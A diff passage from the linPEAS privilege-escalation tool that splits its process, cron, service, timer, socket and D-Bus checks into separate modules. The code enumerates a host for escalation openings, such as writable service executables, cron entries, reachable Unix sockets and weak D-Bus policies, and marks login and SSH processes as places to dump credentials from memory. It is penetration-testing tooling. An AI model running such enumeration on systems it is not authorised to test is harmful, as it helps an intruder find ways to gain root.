-  if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi
-  if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi
-  if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi
-  if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi
-  if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi
-  if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi
-  echo ""
-fi
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  #-- PCS) Different processes 1 min
-  if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
-    print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
-    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs"
-    temp_file=$(mktemp)
-    if [ "$(ps -e -o user,command 2>/dev/null)" ]; then 
-      for i in $(seq 1 1210); do 
-        ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05; 
-      done;
-      sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"; 
-      rm "$temp_file";
-    fi
-    echo ""
-  fi
-fi
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  #-- PCS) Cron
-  print_2title "Cron jobs"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
-  command -v crontab 2>/dev/null || echo_not_found "crontab"
-  crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
-  command -v incrontab 2>/dev/null || echo_not_found "incrontab"
-  incrontab -l 2>/dev/null
-  ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
-  cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},"  | sed "s,root,${SED_RED},"
-  crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
-  ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
-  atq 2>/dev/null
-else
-  print_2title "Cron jobs"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
-  find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \;
-fi
-echo ""
-
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  if [ "$MACPEAS" ]; then
-    print_2title "Third party LaunchAgents & LaunchDemons"
-    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd"
-    ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null
-    echo ""
-
-    print_2title "Writable System LaunchAgents & LaunchDemons"
-    find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do
-      program=""
-      program=$(defaults read "$f" Program 2>/dev/null)
-      if ! [ "$program" ]; then
-        program=$(defaults read "$f" ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
-      fi
-      if [ -w "$program" ]; then
-        echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},";
-      fi
-    done
-    echo ""
-
-    print_2title "StartupItems"
-    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items"
-    ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null
-    echo ""
-
-    print_2title "Login Items"
-    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items"
-    osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null
-    echo ""
-
-    print_2title "SPStartupItemDataType"
-    system_profiler SPStartupItemDataType
-    echo ""
-
-    print_2title "Emond scripts"
-    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond"
-    ls -l /private/var/db/emondClients
-    echo ""
-  fi
-fi
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  #-- PCS) Services
-  if [ "$EXTRA_CHECKS" ]; then
-    print_2title "Services"
-    print_info "Search for outdated versions"
-    (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
-    echo ""
-  fi
-fi
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  #-- PSC) systemd PATH
-  print_2title "Systemd PATH"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths"
-  systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
-  WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders")
-  echo ""
-fi
-
-#-- PSC) .service files
-#TODO: .service files in MACOS are folders
-print_2title "Analyzing .service files"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services"
-printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do
-  if [ ! -O "$s" ] || [ "$SEARCH_IN_FOLDER" ]; then #Remove services that belongs to the current user or if firmware see everything
-    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
-      echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
-    fi
-    servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths
-    printf "%s\n" "$servicebinpaths" | while read sp; do
-      if [ -w "$sp" ]; then
-        echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g"
-      fi
-    done
-    relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/")
-    relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null)
-    if [ "$relpath1" ] || [ "$relpath2" ]; then
-      if [ "$WRITABLESYSTEMDPATH" ]; then
-        echo "$s could be executing some relative path" | sed -${E} "s,.*,${SED_RED},";
-      else
-        echo "$s could be executing some relative path"
-      fi
-    fi
-  fi
-done
-if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi
-echo ""
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  #-- PSC) Timers
-  print_2title "System timers"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
-  (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found
-  echo ""
-fi
-
-#-- PSC) .timer files
-print_2title "Analyzing .timer files"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
-printf "%s\n" "$PSTORAGE_TIMER" | while read t; do
-  if ! [ "$IAMROOT" ] && [ -w "$t" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
-    echo "$t" | sed -${E} "s,.*,${SED_RED},g"
-  fi
-  timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2)
-  printf "%s\n" "$timerbinpaths" | while read tb; do
-    if [ -w "$tb" ]; then
-      echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g"
-    fi
-  done
-  #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`"
-  #for rp in "$relpath"; do
-  #  echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g"
-  #done
-done
-echo ""
-
-#-- PSC) .socket files
-#TODO: .socket files in MACOS are folders
-if ! [ "$IAMROOT" ]; then
-  print_2title "Analyzing .socket files"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
-  printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do
-    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
-      echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g"
-    fi
-    socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
-    printf "%s\n" "$socketsbinpaths" | while read sb; do
-      if [ -w "$sb" ]; then
-        echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g"
-      fi
-    done
-    socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
-    printf "%s\n" "$socketslistpaths" | while read sl; do
-      if [ -w "$sl" ]; then
-        echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g";
-      fi
-    done
-  done
-  echo ""
-  
-  if ! [ "$SEARCH_IN_FOLDER" ]; then
-    print_2title "Unix Sockets Listening"
-    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
-    # Search sockets using netstat and ss
-    unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1)
-    if ! [ "$unix_scks_list" ];then
-      unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+")
-    fi
-    if ! [ "$unix_scks_list" ];then
-      unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2)
-    fi
-     unix_scks_list3=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/") 
-  fi
-  
-  if ! [ "$SEARCH_IN_FOLDER" ]; then
-    # But also search socket files
-    unix_scks_list2=$(find / -type s 2>/dev/null)
-  else
-    unix_scks_list2=$(find "SEARCH_IN_FOLDER" -type s 2>/dev/null)
-  fi
-
-  # Detele repeated dockets and check permissions
-  (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2" && printf "%s\n" "$unix_scks_list3") | sort | uniq | while read l; do
-    perms=""
-    if [ -r "$l" ]; then
-      perms="Read "
-    fi
-    if [ -w "$l" ];then
-      perms="${perms}Write"
-    fi
-    
-    if [ "$EXTRA_CHECKS" ] && [ "$(command -v curl)" ]; then
-      CANNOT_CONNECT_TO_SOCKET="$(curl -v --unix-socket "$l" --max-time 1 http:/linpeas 2>&1 | grep -i 'Permission denied')"
-      if ! [ "$CANNOT_CONNECT_TO_SOCKET" ]; then
-        perms="${perms} - Can Connect"
-      else
-        perms="${perms} - Cannot Connect"
-      fi
-    fi
-    
-    if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g";
-    else 
-      echo "$l" | sed -${E} "s,$l,${SED_RED},g"
-      echo "  └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g"
-      # Try to contact the socket
-      socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null)
-      if [ $? -eq 0 ]; then
-        owner=$(ls -l "$s" | cut -d ' ' -f 3)
-        echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
-        echo "$socketcurl" | head -n 30
-      fi
-    fi
-  done
-  echo ""
-fi
-
-#-- PSC) Writable and weak policies in D-Bus config files
-print_2title "D-Bus config files"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
-if [ "$PSTORAGE_DBUS" ]; then
-  printf "%s\n" "$PSTORAGE_DBUS" | while read d; do
-    for f in $d/*; do
-      if ! [ "$IAMROOT" ] && [ -w "$f" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
-        echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g"
-      fi
-
-      genpol=$(grep "<policy>" "$f" 2>/dev/null)
-      if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
-      #if [ "`grep \"<policy user=\\\"$USER\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi
-
-      userpol=$(grep "<policy user=" "$f" 2>/dev/null | grep -v "root")
-      if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
-      #for g in `groups`; do
-      #  if [ "`grep \"<policy group=\\\"$g\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi
-      #done
-      grppol=$(grep "<policy group=" "$f" 2>/dev/null | grep -v "root")
-      if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
-
-      #TODO: identify allows in context="default"
-    done
-  done
-fi
-echo ""
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "D-Bus Service Objects list"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
-  dbuslist=$(busctl list 2>/dev/null)
-  if [ "$dbuslist" ]; then
-    busctl list | while read line; do
-      echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},";
-      if ! echo "$line" | grep -qE "$dbuslistG"; then
-        srvc_object=$(echo $line | cut -d " " -f1)
-        srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ')
-        if [ "$srvc_object_info" ]; then
-          echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED},"
-        fi
-      fi
-    done
-  else echo_not_found "busctl"
-  fi
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/10_System_timers.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/10_System_timers.sh
@@ -0,0 +1,21 @@
+# Title: Processes & Cron & Services & Timers - System Timers
+# ID: PR_System_timers
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: System Timers
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title, print_info
+# Global Variables: $SEARCH_IN_FOLDER, $timersG
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "System timers"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
+  (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/11_Timer_files.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/11_Timer_files.sh
@@ -0,0 +1,33 @@
+# Title: Processes & Cron & Services & Timers - .timer files
+# ID: PR_Timer_files
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: .timer files
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $IAMROOT, $SEARCH_IN_FOLDER
+# Initial Functions:
+# Generated Global Variables: $timerbinpaths, $relpath
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Analyzing .timer files"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
+printf "%s\n" "$PSTORAGE_TIMER" | while read t; do
+  if ! [ "$IAMROOT" ] && [ -w "$t" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
+    echo "$t" | sed -${E} "s,.*,${SED_RED},g"
+  fi
+  timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2)
+  printf "%s\n" "$timerbinpaths" | while read tb; do
+    if [ -w "$tb" ]; then
+      echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g"
+    fi
+  done
+  #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`"
+  #for rp in "$relpath"; do
+  #  echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g"
+  #done
+done
+echo ""
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/12_Services.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/12_Services.sh
@@ -0,0 +1,23 @@
+# Title: Processes & Cron & Services & Timers - Services
+# ID: PR_Services
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Services outdated versions
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title, print_info
+# Global Variables: $EXTRA_CHECKS, $SEARCH_IN_FOLDER
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  if [ "$EXTRA_CHECKS" ]; then
+    print_2title "Services"
+    print_info "Search for outdated versions"
+    (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
+    echo ""
+  fi
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/13_Service_files.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/13_Service_files.sh
@@ -0,0 +1,42 @@
+# Title: Processes & Cron & Services & Timers - Analyzing .service files
+# ID: PR_Service_files
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Analyze .service files
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $IAMROOT, $SEARCH_IN_FOLDER, $WRITABLESYSTEMDPATH
+# Initial Functions:
+# Generated Global Variables: $relpath1, $relpath2, $servicebinpaths
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+#TODO: .service files in MACOS are folders
+print_2title "Analyzing .service files"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services"
+printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do
+  if [ ! -O "" ] || [ "$SEARCH_IN_FOLDER" ]; then #Remove services that belongs to the current user or if firmware see everything
+    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
+      echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
+    fi
+    servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths
+    printf "%s\n" "$servicebinpaths" | while read sp; do
+      if [ -w "$sp" ]; then
+        echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g"
+      fi
+    done
+    relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/")
+    relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null)
+    if [ "$relpath1" ] || [ "$relpath2" ]; then
+      if [ "$WRITABLESYSTEMDPATH" ]; then
+        echo "$s could be executing some relative path" | sed -${E} "s,.*,${SED_RED},";
+      else
+        echo "$s could be executing some relative path"
+      fi
+    fi
+  fi
+done
+if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi
+echo ""
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/14_Socket_files.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/14_Socket_files.sh
@@ -0,0 +1,38 @@
+# Title: Processes & Cron & Services & Timers - .socket files
+# ID: PR_Socket_files
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: .socket files
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $IAMROOT, $SEARCH_IN_FOLDER
+# Initial Functions:
+# Generated Global Variables: $socketsbinpaths, $socketslistpaths
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+#TODO: .socket files in MACOS are folders
+if ! [ "$IAMROOT" ]; then
+  print_2title "Analyzing .socket files"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
+  printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do
+    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
+      echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g"
+    fi
+    socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
+    printf "%s\n" "$socketsbinpaths" | while read sb; do
+      if [ -w "$sb" ]; then
+        echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g"
+      fi
+    done
+    socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
+    printf "%s\n" "$socketslistpaths" | while read sl; do
+      if [ -w "$sl" ]; then
+        echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g";
+      fi
+    done
+  done
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/15_Unix_sockets_listening.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/15_Unix_sockets_listening.sh
@@ -0,0 +1,72 @@
+# Title: Processes & Cron & Services & Timers - Unix Sockets Listening
+# ID: PR_Unix_sockets_listening
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Unix Sockets Listening
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $EXTRA_CHECKS, $groupsB, $groupsVB, $IAMROOT, $idB, $knw_grps, $knw_usrs, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER
+# Initial Functions:
+# Generated Global Variables: $unix_scks_list, $unix_scks_list2, $unix_scks_list3, $perms, $socketcurl, $owner, $CANNOT_CONNECT_TO_SOCKET
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+#TODO: .socket files in MACOS are folders
+if ! [ "$IAMROOT" ]; then
+  if ! [ "$SEARCH_IN_FOLDER" ]; then
+    print_2title "Unix Sockets Listening"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
+    # Search sockets using netstat and ss
+    unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1)
+    if ! [ "$unix_scks_list" ];then
+      unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+")
+    fi
+    if ! [ "$unix_scks_list" ];then
+      unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2)
+    fi
+      unix_scks_list3=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/") 
+  fi
+  
+  if ! [ "$SEARCH_IN_FOLDER" ]; then
+    # But also search socket files
+    unix_scks_list2=$(find / -type s 2>/dev/null)
+  else
+    unix_scks_list2=$(find "SEARCH_IN_FOLDER" -type s 2>/dev/null)
+  fi
+
+  # Detele repeated dockets and check permissions
+  (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2" && printf "%s\n" "$unix_scks_list3") | sort | uniq | while read l; do
+    perms=""
+    if [ -r "$l" ]; then
+      perms="Read "
+    fi
+    if [ -w "$l" ];then
+      perms="${perms}Write"
+    fi
+    
+    if [ "$EXTRA_CHECKS" ] && [ "$(command -v curl || echo -n '')" ]; then
+      CANNOT_CONNECT_TO_SOCKET="$(curl -v --unix-socket "$l" --max-time 1 http:/linpeas 2>&1 | grep -i 'Permission denied')"
+      if ! [ "$CANNOT_CONNECT_TO_SOCKET" ]; then
+        perms="${perms} - Can Connect"
+      else
+        perms="${perms} - Cannot Connect"
+      fi
+    fi
+    
+    if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g";
+    else 
+      echo "$l" | sed -${E} "s,$l,${SED_RED},g"
+      echo "  └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g"
+      # Try to contact the socket
+      socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null)
+      if [ $? -eq 0 ]; then
+        owner=$(ls -l "$s" | cut -d ' ' -f 3)
+        echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
+        echo "$socketcurl" | head -n 30
+      fi
+    fi
+  done
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/16_DBus_service_objects_list.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/16_DBus_service_objects_list.sh
@@ -0,0 +1,33 @@
+# Title: Processes & Cron & Services & Timers - D-Bus Service Objects list
+# ID: PR_DBus_service_objects_list
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Enumerate D-Bus Service Objects list
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title, print_info
+# Global Variables:  $dbuslistG, $knw_usrs, $nosh_usrs, $rootcommon, $SEARCH_IN_FOLDER, $USER
+# Initial Functions:
+# Generated Global Variables: $dbuslist, $srvc_object, $srvc_object_info
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+  print_2title "D-Bus Service Objects list"
+  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
+  dbuslist=$(busctl list 2>/dev/null)
+  if [ "$dbuslist" ]; then
+    busctl list | while read l; do
